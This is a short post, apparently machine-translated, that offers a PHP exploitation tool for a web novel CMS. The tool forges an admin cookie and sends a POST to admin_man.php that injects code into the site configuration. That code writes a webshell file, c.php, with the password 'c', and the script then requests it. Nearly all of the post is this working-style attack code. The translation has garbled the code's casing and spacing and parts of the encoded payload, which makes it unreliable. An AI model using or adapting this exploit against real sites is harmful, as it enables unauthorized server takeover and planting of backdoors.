Vulnerabilities have always been involved. I recently learned how to write vulnerability exploitation tools. So I found such a small vulnerability and wrote down the tool. For a detailed vulnerability overview, go to t00ls.
<? Php
Ini_set ("max_execution_time", 0 );
Function post ($ v_hosts, $ v_paths, $ v_p)
{
$ Host = $ v_hosts;
$ Path = $ v_paths;
$ Pa = $ v_p;
$ Data = "sitename = & siteurl = % 24% 7B % 24% 7 Bfputs % 28 fopen % 28base64_decode % 28Yy5waHA % 29% 2Cw % 29% 2Cbase64_decode % response % 29% 7D % 7D & email = & keywords = & flush = 6 & html = 1 & reurl = 1 & link = & tongji = & cmdSave = % C8 % B7 % C8 % CF % D0 % DE % B8 % C4 ";
$ Packet = "POST". $ path. $ pa. "/admin_man.php? Id = save http/ 1.1 ";
$ Packet. = "Content-Type: application/x-www-form-urlencoded ";
$ Packet. = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1 )";
$ Packet. = "Host: 127.0.0.1 ";
$ Packet. = "Content-Length:". strlen ($ data )."";
$ Packet. = "Connection: Keep-Alive ";
$ Packet. = "Cookie: x_Cookie = admin ;";
$ Packet. = $ data;
$ O = @ fsockopen ($ host, 80 );
If (! $ O ){
Echo "[x] does not return, and the website may not be accessible! ";
Die;
}
Fputs ($ o, $ packet );
$ I = "[x] waiting .";
Echo $ I;
$ B = ".";
While (! Feof ($ o )){
$ Data. = fread ($ o, 1024 );
$ B. = ".";
Echo $ B;
}
Fclose ($ o );
$ OK = strstr ($ data, "alert ");
If (empty ($ OK )){
Echo "[x] failed. As for the reason, find it for yourself! ";
Die;
} Else {
Echo "[O] Write configuration successful! ";
}
}
Function got ($ g_hosts, $ g_paths)
{
$ Host1 = $ g_hosts;
$ Path1 = $ g_paths;
$ Packet1 = "GET". $ path1. "/config. php HTTP/1.1 ";
$ Packet1. = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1 )";
$ Packet1. = "Host: 127.0.0.1 ";
$ Packet1. = "Connection: Keep-Alive ";
$ Fg = @ fsockopen ($ host1, 80 );
Fputs ($ fg, $ packet1 );
$ Packet2 = "GET". $ path1. "/c. php HTTP/1.1 ";
$ Packet2. = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1 )";
$ Packet2. = "Host: 127.0.0.1 ";
$ Packet2. = "Connection: Keep-Alive ";
Fputs ($ fg, $ packet2 );
$ I = "[x] writing to shell .";
Echo $ I;
$ B = ".";
While (! Feof ($ fg )){
$ Data1. = fread ($ fg, 1024 );
$ B. = ".";
Echo $ B;
}
$ Ok1 = strstr ($ data1, "huan ");
If (empty ($ ok1 )){
Echo "[x] Not written? Find the cause by yourself. ";
Die;
} Else {
Echo "[O] Try webshell. [O] The address is http: //". $ host1. "/c. php. The password is c. ";
}
Fclose ($ fg );
}
$ Hosts = $ argv [1];
$ Paths = $ argv [2];
$ P = $ argv [3];
If (empty ($ hosts) or empty ($ paths) or empty ($ p )){
Print_r ([x] Cold dy novel system vulnerability exploitation tool
[X] code by magic spring (bl4ck)
[-] Usage: php exp. php website address Website path background path
[-] Php exp. php localhost/ldbook/admin
);
Die;
}
Post ($ hosts, $ paths, $ p );
Got ($ hosts, $ paths );
?>